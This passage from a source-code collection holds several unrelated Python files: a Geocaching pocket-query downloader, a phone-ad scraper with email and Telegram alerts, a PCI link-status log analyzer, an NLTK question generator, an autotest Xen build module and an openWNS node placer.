LOGIN_URL = "%s/login" % (BASE_URL)
POCKET_QUERY_URL = "%s/pocket" % (BASE_URL)
CHUNK_SIZE = 1024
XPATH_DOWNLOADPQ = "//a[contains(@href,'downloadpq')]"
def __init__(self, driver, args):
self.driver = driver
self.args = args
def login(self):
""" Login on Geocaching.com """
self.driver.get(self.LOGIN_URL)
element = self.driver.find_element_by_id("ctl00_ContentBody_tbUsername")
element.send_keys(self.args.user)
element = self.driver.find_element_by_id("ctl00_ContentBody_tbPassword")
element.send_keys(self.args.password)
element = self.driver.find_element_by_id("ctl00_ContentBody_btnSignIn")
element.click()
def download_pq_by_element(self, element):
""" Download pocket query with selenium webelement """
url = element.get_attribute("href")
filename = "%s.zip" % (element.get_attribute("text").strip())
opener = urllib2.build_opener()
cookies = self.driver.get_cookies()
if cookies:
cookiestring = ''
for cookie in cookies:
cookiestring += "%s=%s;" % (cookie["name"], cookie["value"])
opener.addheaders.append(
('Cookie', cookiestring))
fhandle = opener.open(url)
total_size = int(fhandle.info().getheader('Content-Length').strip())
pbar = progressbar.ProgressBar(maxval=total_size).start()
print filename
with open(self.args.output + filename, 'wb') as foutput:
while True:
data = fhandle.read(self.CHUNK_SIZE)
if not data:
break
foutput.write(data)
pbar.update(foutput.tell())
pbar.finish()
def download_pocket_queries(self):
""" Download all pocket queries on geocaching.com """
self.driver.get(self.POCKET_QUERY_URL)
elements = self.driver.find_elements_by_xpath(self.XPATH_DOWNLOADPQ)
if elements:
for element in elements:
self.download_pq_by_element(element)
else:
print "No pocket queries available to download !"
def arg_parser():
""" Argument parser """
parser = argparse.ArgumentParser()
parser.formatter_class = argparse.RawDescriptionHelpFormatter
parser.description = "%s, version %s by %s (%s)\n\n%s" \
% (__filename__,__version__,__author__,__email__,__purpose__)
parser.add_argument(
"--browser","-b",
choices=BROWSERS,
default=BROWSERS[0],
help="browser used for visiting geocaching.com")
parser.add_argument(
"--download",
action="store_true",
help="download pocket queries")
parser.add_argument(
"--user","-u",
required=True,
help="Geocaching.com username")
parser.add_argument(
"--password","-p",
required=True,
help="Geocaching.com password")
parser.add_argument(
"--output","-o",
default="",
help="output directory")
args = parser.parse_args()
return args
def main():
""" Obviously the main routine """
args = arg_parser()
if args.browser == BROWSERS[0]:
user_agent = (
"Mozilla/5.0 (X11; Linux x86_64) " +
"AppleWebKit/537.36 (KHTML, like Gecko) " +
"Chrome/31.0.1650.63 Safari/537.36")
dcap = dict(DesiredCapabilities.PHANTOMJS)
dcap["phantomjs.page.settings.userAgent"] = user_agent
driver = webdriver.PhantomJS(desired_capabilities=dcap)
elif args.browser == BROWSERS[1]:
driver = webdriver.Chrome()
driver.set_window_size(800, 400)
elif args.browser == BROWSERS[2]:
driver = webdriver.Firefox()
elif args.browser == BROWSERS[3]:
driver = webdriver.Ie()
if args.download:
site = GCSite(driver, args)
site.login()
site.download_pocket_queries()
driver.quit()
if __name__ == "__main__":
main()
|
simenon/pocket-query-downloader
|
gc_util.py
|
Python
|
gpl-2.0
| 5,704
|
#!/usr/bin/python2 -tt
# Author: Milos Buncic
# Date: 29.06.2014
# Description: Search for specific article on the specific web page and send an email if you found something
import os
import sys
import re
import json
import smtplib
import requests
from telegram import Bot
from bs4 import BeautifulSoup
from ConfigParser import SafeConfigParser
from random import randint
### Config file location
config_filename = '/etc/malioglasi.conf'
### Web page url
url = 'http://www.mobilnisvet.com/mobilni-malioglasi'
### Datastore file
filename = '/var/tmp/mobilnisvet.json'
def sendmail(text, username, password, sender, recipient, subject):
""" Mail sender """
MESSAGE = text
message = 'From: %s\nTo: %s\nSubject: %s\n\n%s' % (sender, ', '.join(recipient), subject, MESSAGE)
try:
server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
#server.login(username, password)
server.login(username, password[password.find('$')+1:].decode('base64'))
server.sendmail(sender, recipient, message)
server.close()
except Exception as e:
print 'Failed to send an email: %s' % e
else:
print 'Mail successfully sent!'
def sendtelegram(token, chat_id, message):
""" Send message via telegram bot """
try:
bot = Bot(token=token)
bot.send_message(chat_id=chat_id, text=message)
except Exception as e:
print 'Failed to send telegram message: %s' % e
else:
print 'Telegram successfully sent!'
def phoneInfo(url, company, model):
""" Return a dictionary with phone properties """
headers = [
{"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"},
{"User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"},
{"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"},
{"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"},
{"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0"}
]
random_headers = headers[randint(0,len(headers)-1)]
r = requests.get(url, headers=random_headers)
r.encoding = 'utf-8'
html = r.text
reg = company + r'<br\s/>' + model + r'</strong>.*?\d{3}-\d\d-\d\d\s\d\d:\d\d:\d\d'
match = re.search(reg, html, re.DOTALL)
if match:
soup = BeautifulSoup(match.group(), "lxml")
text = soup.get_text()
list = [ e for e in text.split('\n') if e ]
del list[:-3]
price = list[0].strip()
text = list[1].strip()
phone = list[-1][:list[-1].index('#')].strip()
id = list[-1][list[-1].index('#')+1:list[-1].index('|')].strip()
date = list[-1][list[-1].index('|')+1:].strip()
d = {}
d['1-Company'] = company
d['2-Model'] = model
d['3-Price'] = price
d['4-Text'] = text
d['5-Phone'] = phone
d['6-Date'] = date
d['7-ID'] = id
return d
def readConfig(config_filename, section):
""" Parse config file and return dictionary """
parser = SafeConfigParser()
parser.read(config_filename)
d = {}
for k,v in parser.items(section):
d[k] = v
return d
def keywordMatch(text, keywords=[]):
""" Check if keywords are included in the text """
for keyword in keywords:
if re.search(keyword, text, re.IGNORECASE):
return True
return False
def writeToFile(filename, text):
""" Write new data to file """
try:
with open(filename, 'w') as f:
f.write(json.dumps(text, indent=4, ensure_ascii=False, sort_keys=True).encode('utf-8'))
print 'Datastore %s has been updated' % filename
except IOError:
print 'Error while writing to file'
def readFromFile(filename):
""" Read old data from file and return a dictionary """
try:
with open(filename, 'r') as f:
return json.load(f)
except IOError:
print 'Error while reading from file'
def main():
if not os.path.isfile(config_filename):
print 'Could not find configuration file ' + config_filename
sys.exit(1)
telegram = readConfig(config_filename, 'Telegram')
email = readConfig(config_filename, 'Email')
filters = readConfig(config_filename, 'Filters')
search = readConfig(config_filename, 'Search')
token = telegram['token']
chat_id = telegram['chat_id']
username = email['username']
password = email['password']
sender = email['sender']
recipient = email['recipient'].split()
bkw = filters['blacklisted_keywords'].split()
wkw = filters['whitelisted_keywords'].split()
updated = False
if os.path.isfile(filename):
d_final = readFromFile(filename)
# Remove stale keys from datastore if there is any
for k in d_final.keys():
if k not in search.keys():
del d_final[k]
updated = True
else:
d_final = {}
# Go through every 'model' and 'name' from configuration file
for m,n in search.items():
company = n.split('-')[0].strip()
model = n.split('-')[1].strip()
subject = 'Mobilnisvet - %s %s' % (company, model)
d = phoneInfo(url, company, model)
if not d:
print 'Could not find model %s %s' % (company, model)
continue
text = ''
for k,v in sorted(d.items()):
text += k + ': ' + v + '\n'
text = text.encode('utf-8')
# Check if there is any blacklisted or whitelisted keywords in the text
if filters['black_enabled'] == 'yes' and filters['white_enabled'] == 'no' and keywordMatch(text, bkw):
continue
elif filters['white_enabled'] == 'yes' and filters['black_enabled'] == 'no' and not keywordMatch(text, wkw):
continue
elif filters['black_enabled'] == 'yes' and filters['white_enabled'] == 'yes' and keywordMatch(text, bkw):
continue
# Enable notification if one of notify methods is enabled and there is none unwanted keywords
notify_email = False
if email['enabled'] == 'yes' :
notify_email = True
notify_telegram = False
if telegram['enabled'] == 'yes':
notify_telegram = True
if d_final and m in d_final:
new_id = d['7-ID']
old_id = d_final[m]['7-ID']
if new_id != old_id:
print 'Id %s has changed to %s' % (old_id, new_id)
updated = True
d_final[m] = d
if notify_telegram:
sendtelegram(token, chat_id, text)
elif notify_email:
sendmail(text, username, password, sender, recipient, subject)
else:
print 'Same id %s nothing to do' % (new_id)
else:
updated = True
d_final[m] = d
if notify_telegram:
sendtelegram(token, chat_id, text)
elif notify_email:
sendmail(text, username, password, sender, recipient, subject)
if updated:
writeToFile(filename, d_final)
if __name__ == '__main__':
main()
|
psyhomb/malioglasi
|
malioglasi.py
|
Python
|
gpl-2.0
| 6,894
|
# coding=utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
"""
Name: AnalysisWinPIRALog_LINUX
Author: Andy Liu
Email : andy.liu.ud@hotmail.com
Created: 3/24/2015
Copyright: Copyright ©Intel Corporation. All rights reserved.
Licence: This program is free software: you can redistribute it
and/or modify it under the terms of the GNU General Public License
as published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import argparse
import logging
import os
import re
import sys
import xlwt
from copy import deepcopy
from pprint import pformat
from AnalysisWinPIRALog.MyLog import init_logger
from encoder import XML2Dict
class AnalysisLog:
def __init__(self, _config_file, _log_file):
self._config_file = _config_file
self._log_file = _log_file
self.config_dict = dict()
self.log_dict = dict()
self.result_list = list()
self.start = re.compile(r'^[0-9a-f]{2}:[0-9a-f]{2}\.\d')
self._key_word = 'DEV_NAME'
self.return_value = True
def parse_config_file(self):
logging.debug('Into function parse_config_file')
with open(self._config_file, 'r') as f:
_xml_str = f.read()
try:
_obj = XML2Dict(coding='utf-8')
self.config_dict = _obj.parse(_xml_str)
logging.debug('config_dict : %s' % pformat(self.config_dict))
logging.info('Parse config file done')
return self.config_dict
except Exception, e:
logging.error("Can't parse as XML!")
logging.exception(e)
sys.exit(1)
# def warning_duplicate_dev_add(self):
# logging.debug('Into warning_duplicate_dev_add')
# _verify_list = list()
# for _dev_type, _expect_values in self.config_dict.get('xml').iteritems():
# if isinstance(_expect_values, list):
# for _expect_value in _expect_values:
# if _expect_value.get(self._key_word) in _verify_list:
# logging.error('Duplicate device address : %s' % _expect_value.get(self._key_word))
# sys.exit(1)
# else:
# _verify_list.append(_expect_value.get(self._key_word))
# elif isinstance(_expect_values, dict):
# if _expect_values.get(self._key_word) in _verify_list:
# logging.error('Duplicate device address : %s' % _expect_values.get(self._key_word))
# sys.exit(1)
# else:
# _verify_list.append(_expect_values.get(self._key_word))
# if len(_verify_list) == 0:
# logging.error("Can't find key word <%s>" % self._key_word)
# sys.exit(1)
# logging.info('Verify duplicate device address done')
# return True
def parse_log_file(self):
logging.debug('Into parse_log_file')
_record = dict()
_dev_name = ''
with open(self._log_file, 'r') as f:
# remove header and footer in log file
for _line in f.readlines():
_line = _line.strip()
if _line and ':' in _line:
if re.findall(self.start, _line):
if _record:
self.log_dict.update({_dev_name.strip(): deepcopy(_record)})
_record.clear()
_bus_no, _dev_name = _line.split(' ', 1)
_record.update({'BUS_NO': _bus_no.strip(), 'DEV_NAME': _dev_name.strip()})
else:
_key, _value = _line.split(':', 1)
_record.update({_key.strip(): _value.strip()})
else:
self.log_dict.update({_dev_name.strip(): deepcopy(_record)})
pass
logging.debug('log_dict : %s' % pformat(self.log_dict))
logging.info('Parse log file done')
return self.log_dict
def verify_result(self):
for _dev_type, _expect_values in self.config_dict.get('xml').iteritems():
if isinstance(_expect_values, list):
logging.debug('_expect_values is list')
for _expect_value in _expect_values:
_key_word = _expect_value.get(self._key_word)
if _key_word in self.log_dict:
_record = self.log_dict.get(_key_word)
if self.compare_result(_expect_value, _record):
_record.update({'Result': 'PASSED'})
else:
_record.update({'Result': 'FAILED'})
self.return_value = False
self.result_list.append(_record)
else:
self.result_list.append({self._key_word: _key_word, 'Result': 'Not Found'})
self.return_value = False
elif isinstance(_expect_values, dict):
logging.debug('_expect_values is dict')
_key_word = _expect_values.get(self._key_word)
if _key_word in self.log_dict:
_record = self.log_dict.get(_key_word)
if self.compare_result(_expect_values, _record):
_record.update({'Result': 'PASSED'})
else:
_record.update({'Result': 'FAILED'})
self.return_value = False
self.result_list.append(_record)
else:
self.result_list.append({self._key_word: _key_word, 'Result': 'Not Found'})
self.return_value = False
logging.debug('result_list : %s' % pformat(self.result_list))
logging.info('Verify result done')
@staticmethod
def compare_result(_expect_value, _record):
"""
expect_value:
{'DEV_NAME': 'PCI bridge: Intel Corporation Haswell-E PCI Express Root Port 1 (rev 02) (prog-if 00 [Normal decode])'}
_record:
{'ACSCap': 'SrcValid+ TransBlk+ ReqRedir+ CmpltRedir+ UpstreamFwd+ EgressCtrl- DirectTrans-',
'ACSCtl': 'SrcValid- TransBlk- ReqRedir- CmpltRedir- UpstreamFwd- EgressCtrl- DirectTrans-',
'AERCap': 'First Error Pointer: 00, GenCap- CGenEn- ChkCap- ChkEn-',
'Address': 'fee00438 Data: 0000',
'BUS_NO': '00:01.0',
'BridgeCtl': 'Parity+ SERR+ NoISA- VGA- MAbort- >Reset- FastB2B-',
'Bus': 'primary=00, secondary=01, subordinate=01, sec-latency=0',
'CEMsk': 'RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr-',
'CESta': 'RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr-',
'Capabilities': '[300 v1] Vendor Specific Information: ID=0008 Rev=0 Len=038 <?>',
'Changed': 'MRL- PresDet- LinkState+',
'Compliance De-emphasis': '-6dB',
'Control': 'AttnInd Off, PwrInd Off, Power- Interlock-',
'DEV_NAME': 'PCI bridge: Intel Corporation Haswell-E PCI Express Root Port 1 (rev 02) (prog-if 00 [Normal decode])',
'DevCap': 'MaxPayload 256 bytes, PhantFunc 0, Latency L0s <64ns, L1 <1us',
'DevCap2': 'Completion Timeout: Range BCD, TimeoutDis+, LTR-, OBFF Not Supported ARIFwd+',
'DevCtl': 'Report errors: Correctable- Non-Fatal+ Fatal+ Unsupported-',
'DevCtl2': 'Completion Timeout: 260ms to 900ms, TimeoutDis-, LTR-, OBFF Disabled ARIFwd+',
'DevSta': 'CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend-',
'Flags': 'PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+)',
'I/O behind bridge': '0000f000-00000fff',
'Kernel driver in use': 'pcieport',
'Kernel modules': 'shpchp',
'Latency': '0',
'LnkCap': 'Port #1, Speed 8GT/s, Width x8, ASPM L1, Latency L0 <512ns, L1 <16us',
'LnkCtl': 'ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+',
'LnkCtl2': 'Target Link Speed: 8GT/s, EnterCompliance- SpeedDis-',
'LnkSta': 'Speed 8GT/s, Width x8, TrErr- Train- SlotClk+ DLActive+ BWMgmt- ABWMgmt-',
'LnkSta2': 'Current De-emphasis Level: -6dB, EqualizationComplete+, EqualizationPhase1+',
'Masking': '00000003 Pending: 00000000',
'Memory behind bridge': '91c00000-91cfffff',
'Prefetchable memory behind bridge': '0000383ffc000000-0000383ffdffffff',
'RootCap': 'CRSVisible-',
'RootCtl': 'ErrCorrectable- ErrNon-Fatal+ ErrFatal+ PMEIntEna- CRSVisible-',
'RootSta': 'PME ReqID 0000, PMEStatus- PMEPending-',
'Secondary status': '66MHz- FastB2B- ParErr- DEVSEL=fast >TAbort- <TAbort- <MAbort+ <SERR- <PERR-',
'SltCap': 'AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug- Surprise-',
'SltCtl': 'Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg-',
'SltSta': 'Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock-',
'Status': 'D0 NoSoftRst+ PME-Enable- DSel=0 DScale=0 PME-',
'Transmit Margin': 'Normal Operating Range, EnterModifiedCompliance- ComplianceSOS-',
'UEMsk': 'DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt+ UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq+ ACSViol-',
'UESta': 'DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol-',
'UESvrt': 'DLP+ SDES+ TLP+ FCP+ CmpltTO+ CmpltAbrt+ UnxCmplt+ RxOF+ MalfTLP+ ECRC- UnsupReq- ACSViol+'}
"""
_return_value = True
_reason = list()
_pattern = re.compile(r'Speed\s*(.*),\s*Width\s*(\w*),')
if 'LnkCap' in _record:
if 'LnkSta' in _record:
logging.debug('the key word LnkCap in log : %s' % (pformat(_record.get('LnkCap'))))
logging.debug('the key word LnkSta in log : %s' % (pformat(_record.get('LnkSta'))))
l_LnkCap = _pattern.findall(_record.get('LnkCap'))[0]
logging.debug('l_LnkCap : %s' % pformat(l_LnkCap))
l_LnkSta = _pattern.findall(_record.get('LnkSta'))[0]
logging.debug('l_LnkSta : %s' % pformat(l_LnkSta))
if l_LnkCap == l_LnkSta:
logging.debug('Speed and Width compare PASSED')
else:
_reason.append('Speed and Width compare FAILED')
logging.debug('Speed and Width compare FAILED')
_return_value = False
else:
_reason.append('the key word <LnkSta> is not include in log %s' % (pformat(_record)))
logging.debug('the key word LnkSta is not include in log %s' % (pformat(_record)))
_return_value = False
else:
_reason.append('the key word <LnkCap> is not include in log %s' % (pformat(_record)))
logging.debug('the key word LnkCap is not include in log %s' % (pformat(_record)))
_return_value = False
_record.update({'Reason': _reason})
return _return_value
def output_detail_result(self, output_file):
_show_list = ['Result', 'Reason', 'BUS_NO', 'DEV_NAME']
fp = xlwt.Workbook()
table = fp.add_sheet('Detail Result')
for _idx, _title in enumerate(_show_list):
table.write(0, _idx, _title)
for _row, _record in enumerate(self.result_list):
for _column, _title in enumerate(_show_list):
if _title in _record:
if isinstance(_record.get(_title), list):
_text = '\n'.join(_record.get(_title))
else:
_text = _record.get(_title)
else:
_text = ''
table.write(_row + 1, _column, _text)
fp.save(output_file)
def parse_command_line():
"""
parse command line
"""
parser = argparse.ArgumentParser()
parser.add_argument('--logfile', '-l', action="store", dest="log_file", help="log file path")
parser.add_argument('--configfile', '-c', action="store", dest="config_file", help="config file path")
parser.add_argument('--outputfile', '-o', action="store", dest="output_file", help="output file path")
parser.add_argument('--resultfile', '-r', action="store", dest="result_file", help="result file path")
parser.add_argument("--debug", '-d', action="store_true", dest="debug", default=False, help="Show debug info")
args = parser.parse_args()
config_file = args.config_file
log_file = args.log_file
output_file = args.output_file
result_file = args.result_file
if config_file is None:
config_file = 'config.xml'
if not os.path.exists(config_file):
logging.error("Can't find config file!")
logging.error("Please input config file path!")
parser.print_help()
sys.exit(1)
args.config_file = config_file
if log_file is None:
log_file = 'log.txt'
if not os.path.exists(log_file):
logging.error("Can't find log file!")
logging.error("Please input log file path!")
parser.print_help()
sys.exit(1)
args.log_file = log_file
if output_file is None:
args.output_file = 'output.xls'
if result_file is None:
args.result_file = 'result.txt'
return args
def main():
args = parse_command_line()
logger = init_logger(args.debug)
logger.info('================== Start ==================')
al = AnalysisLog(_config_file=args.config_file, _log_file=args.log_file)
al.parse_config_file()
# if al.warning_duplicate_dev_add():
al.parse_log_file()
al.verify_result()
if al.return_value:
with open(args.result_file, 'w') as f:
f.write(b'PASSED')
logger.info('PASSED')
else:
with open(args.result_file, 'w') as f:
f.write(b'FAILED')
logger.info('FAILED')
al.output_detail_result(args.output_file)
logger.info('Detail log please check the %s' % args.output_file)
logger.info('=================== End ===================')
if __name__ == '__main__':
main()
|
asiroliu/AnalysisWinPIRALog
|
AnalysisWinPIRALog_LINUX.py
|
Python
|
gpl-2.0
| 14,575
|
import nltk
import json
import sys
sys.path.append("../../")
import parser
from entity import Word
class ModelRewriter:
rewriteRules = None
rewriteRuleFileName = "model.txt"
@staticmethod
def loadModel():
inputFile = open("model.txt")
modelJsonString = inputFile.read()
inputFile.close()
modelMap = json.loads(modelJsonString)
ModelRewriter.rewriteRules = modelMap
return modelMap
def __init__(self):
if ModelRewriter.rewriteRules is None:
ModelRewriter.rewriteRules = ModelRewriter.loadModel()
#this is the only method the user need to invoke
@staticmethod
def generateQuestions(inputSentence):
print inputSentence
sentencePOS = ModelRewriter.getPOSList(inputSentence)
nearestModels = ModelRewriter.getNearestModel(sentencePOS)
questions = []
for model in nearestModels:
tempQuestionList = ModelRewriter.generateQuestionFromModel(model, inputSentence)
questions += tempQuestionList
return questions
@staticmethod
def parseSentence(sentence):
questionWordMap = {}
text = nltk.word_tokenize(sentence)
posTag = nltk.pos_tag(text)
for i in xrange(len(text)):
word = Word()
word.index = i
word.pos = posTag[i][1]
questionWordMap[text[i]] = word
questionWordMap["WHOLE-SENTENCE-LIST"] = text
return questionWordMap
@staticmethod
def getNearestModel(sentencePOSList):
'''
return the nearest model
'''
nearestModelList = []
modelList = ModelRewriter.rewriteRules["template"]
for model in modelList:
posList = model["pos"]
if ModelRewriter.comparePOSList(sentencePOSList, posList):
nearestModelList.append(model)
return nearestModelList
@staticmethod
def comparePOSList(templateModelPOSList, newModelPOSList):
if len(templateModelPOSList) != len(newModelPOSList):
return False
else:
print templateModelPOSList
print newModelPOSList
for i in xrange(len(templateModelPOSList)):
tempTemplate = unicode(templateModelPOSList[i])
tempNew = unicode(newModelPOSList[i])
if tempTemplate != tempNew:
return False
return True
@staticmethod
def getPOSList(sentence):
tokenList = nltk.word_tokenize(sentence)
posList = nltk.pos_tag(tokenList)
resultList = []
for temp in posList:
resultList.append(temp[1])
return resultList
@staticmethod
def generateQuestionFromModel(model, inputSentence):
sentenceToken = nltk.word_tokenize(inputSentence)
questions = []
if model.has_key("Easy"):
questionList = model["Easy"]
for questionMap in questionList:
question = ModelRewriter.generateSingleQuestion(questionMap, sentenceToken)
if question is not None:
questions.append(question) #merge two lists
elif model.has_key["Medium"]:
pass
elif model.has_key["Hard"]:
pass
elif model.has_key["Ghost"]:
pass
return questions
@staticmethod
def generateSingleQuestion(modelMap, sentenceToken):
question = modelMap["question"]
indexList = modelMap["index"]
questionToken = nltk.word_tokenize(question.strip())
questionString = ""
indexList = indexList.strip().split()
for i in xrange(len(indexList)):
if indexList[i] == "-":
questionString += questionToken[i]
else:
questionString += sentenceToken[int(indexList[i].strip())]
questionString += " "
return questionString.strip()
if __name__ == "__main__":
print ModelRewriter.getPOSList("He received two yellow cards as Chelsea lost at White Hart Lane for the first time since 1987.")
|
cuijiaxing/nlp
|
rewriter/rules/rewrite_rule/generator.py
|
Python
|
gpl-2.0
| 4,155
|
__author__ = """Copyright Martin J. Bligh, 2006,
Copyright IBM Corp. 2006, Ryan Harper <ryanh@us.ibm.com>"""
import os, shutil, copy, pickle, re, glob
from autotest_lib.client.bin import kernel, kernel_config, os_dep, test
from autotest_lib.client.bin import utils
class xen(kernel.kernel):
def log(self, msg):
print msg
self.logfile.write('%s\n' % msg)
def __init__(self, job, base_tree, results_dir, tmp_dir, build_dir,
leave = False, kjob = None):
# call base-class
kernel.kernel.__init__(self, job, base_tree, results_dir,
tmp_dir, build_dir, leave)
self.kjob = kjob
def config(self, config_file, config_list = None):
raise NotImplementedError('config() not implemented for xen')
def build(self, make_opts = '', logfile = '', extraversion='autotest'):
"""build xen
make_opts
additional options to make, if any
"""
self.log('running build')
os_dep.commands('gcc', 'make')
# build xen with extraversion flag
os.environ['XEN_EXTRAVERSION'] = '-unstable-%s'% extraversion
if logfile == '':
logfile = os.path.join(self.log_dir, 'xen_build')
os.chdir(self.build_dir)
self.log('log_dir: %s ' % self.log_dir)
self.job.logging.tee_redirect_debug_dir(self.log_dir, log_name=logfile)
# build xen hypervisor and user-space tools
targets = ['xen', 'tools']
threads = 2 * utils.count_cpus()
for t in targets:
build_string = 'make -j %d %s %s' % (threads, make_opts, t)
self.log('build_string: %s' % build_string)
utils.system(build_string)
# make a kernel job out of the kernel from the xen src if one isn't provided
if self.kjob is None:
# get xen kernel tree ready
self.log("prep-ing xen'ified kernel source tree")
utils.system('make prep-kernels')
v = self.get_xen_kernel_build_ver()
self.log('building xen kernel version: %s' % v)
# build xen-ified kernel in xen tree
kernel_base_tree = os.path.join(self.build_dir, \
'linux-%s' % self.get_xen_kernel_build_ver())
self.log('kernel_base_tree = %s' % kernel_base_tree)
# fix up XENGUEST value in EXTRAVERSION; we can't have
# files with '$(XENGEUST)' in the name, =(
self.fix_up_xen_kernel_makefile(kernel_base_tree)
# make the kernel job
self.kjob = self.job.kernel(kernel_base_tree)
# hardcoding dom0 config (no modules for testing, yay!)
# FIXME: probe host to determine which config to pick
c = self.build_dir + '/buildconfigs/linux-defconfig_xen0_x86_32'
self.log('using kernel config: %s ' % c)
self.kjob.config(c)
# Xen's kernel tree sucks; doesn't use bzImage, but vmlinux
self.kjob.set_build_target('vmlinuz')
# also, the vmlinuz is not out in arch/*/boot, ARGH! more hackery
self.kjob.set_build_image(self.job.tmpdir + '/build/linux/vmlinuz')
self.kjob.build()
self.job.logging.restore()
xen_version = self.get_xen_build_ver()
self.log('BUILD VERSION: Xen: %s Kernel:%s' % \
(xen_version, self.kjob.get_kernel_build_ver()))
def build_timed(self, *args, **kwds):
raise NotImplementedError('build_timed() not implemented')
def install(self, tag='', prefix = '/', extraversion='autotest'):
"""make install in the kernel tree"""
self.log('Installing ...')
os.chdir(self.build_dir)
if not os.path.isdir(prefix):
os.mkdir(prefix)
self.boot_dir = os.path.join(prefix, 'boot')
if not os.path.isdir(self.boot_dir):
os.mkdir(self.boot_dir)
# remember what we are going to install
xen_version = '%s-%s' % (self.get_xen_build_ver(), extraversion)
self.xen_image = self.boot_dir + '/xen-' + xen_version + '.gz'
self.xen_syms = self.boot_dir + '/xen-syms-' + xen_version
self.log('Installing Xen ...')
os.environ['XEN_EXTRAVERSION'] = '-unstable-%s'% extraversion
# install xen
utils.system('make DESTDIR=%s -C xen install' % prefix)
# install tools
utils.system('make DESTDIR=%s -C tools install' % prefix)
# install kernel
ktag = self.kjob.get_kernel_build_ver()
kprefix = prefix
self.kjob.install(tag=ktag, prefix=kprefix)
def add_to_bootloader(self, tag='autotest', args=''):
""" add this kernel to bootloader, taking an
optional parameter of space separated parameters
e.g.: kernel.add_to_bootloader('mykernel', 'ro acpi=off')
"""
# turn on xen mode
self.job.bootloader.enable_xen_mode()
# remove existing entry if present
self.job.bootloader.remove_kernel(tag)
# add xen and xen kernel
self.job.bootloader.add_kernel(self.kjob.image, tag,
self.kjob.initrd, self.xen_image)
# if no args passed, populate from /proc/cmdline
if not args:
args = open('/proc/cmdline', 'r').readline().strip()
# add args to entry one at a time
for a in args.split(' '):
self.job.bootloader.add_args(tag, a)
# turn off xen mode
self.job.bootloader.disable_xen_mode()
def get_xen_kernel_build_ver(self):
"""Check xen buildconfig for current kernel version"""
version = patchlevel = sublevel = ''
extraversion = localversion = ''
version_file = self.build_dir + '/buildconfigs/mk.linux-2.6-xen'
for line in open(version_file, 'r').readlines():
if line.startswith('LINUX_VER'):
start = line.index('=') + 1
version = line[start:].strip() + "-xen"
break
return version
def fix_up_xen_kernel_makefile(self, kernel_dir):
"""Fix up broken EXTRAVERSION in xen-ified Linux kernel Makefile"""
xenguest = ''
makefile = kernel_dir + '/Makefile'
for line in open(makefile, 'r').readlines():
if line.startswith('XENGUEST'):
start = line.index('=') + 1
xenguest = line[start:].strip()
break;
# change out $XENGUEST in EXTRAVERSION line
utils.system('sed -i.old "s,\$(XENGUEST),%s," %s' % (xenguest,
makefile))
def get_xen_build_ver(self):
"""Check Makefile and .config to return kernel version"""
version = patchlevel = sublevel = ''
extraversion = localversion = ''
for line in open(self.build_dir + '/xen/Makefile', 'r').readlines():
if line.startswith('export XEN_VERSION'):
start = line.index('=') + 1
version = line[start:].strip()
if line.startswith('export XEN_SUBVERSION'):
start = line.index('=') + 1
sublevel = line[start:].strip()
if line.startswith('export XEN_EXTRAVERSION'):
start = line.index('=') + 1
extraversion = line[start:].strip()
return "%s.%s%s" % (version, sublevel, extraversion)
|
yochow/autotest
|
client/bin/xen.py
|
Python
|
gpl-2.0
| 7,532
|
###############################################################################
# This file is part of openWNS (open Wireless Network Simulator)
# _____________________________________________________________________________
#
# Copyright (C) 2004-2007
# Chair of Communication Networks (ComNets)
# Kopernikusstr. 16, D-52074 Aachen, Germany
# phone: ++49-241-80-27910,
# fax: ++49-241-80-22242
# email: info@openwns.org
# www: http://www.openwns.org
# _____________________________________________________________________________
#
# openWNS is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License version 2 as published by the
# Free Software Foundation;
#
# openWNS is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
import scenarios.interfaces
import openwns.geometry.position
import math
class PositionListPlacer(scenarios.interfaces.INodePlacer):
"""
Place a number of nodes on the given positions.
"""
def __init__(self, numberOfNodes = 1, positionsList = [openwns.geometry.position.Position(1,1)], rotate = 0.0):
"""
@type numberOfNodes: int
@param numberOfNodes: The number of nodes on the circle
@Type: position: float
@param position: distance from BS in Meters for every single node
@type rotate: float
@param rotate: Rotate the final result by rotate in radiant [0..2pi]
"""
self.center = openwns.geometry.position.Position(x = 0.0, y = 0.0, z = 0.0)
self.numberOfNodes = numberOfNodes
self.positionsList = positionsList
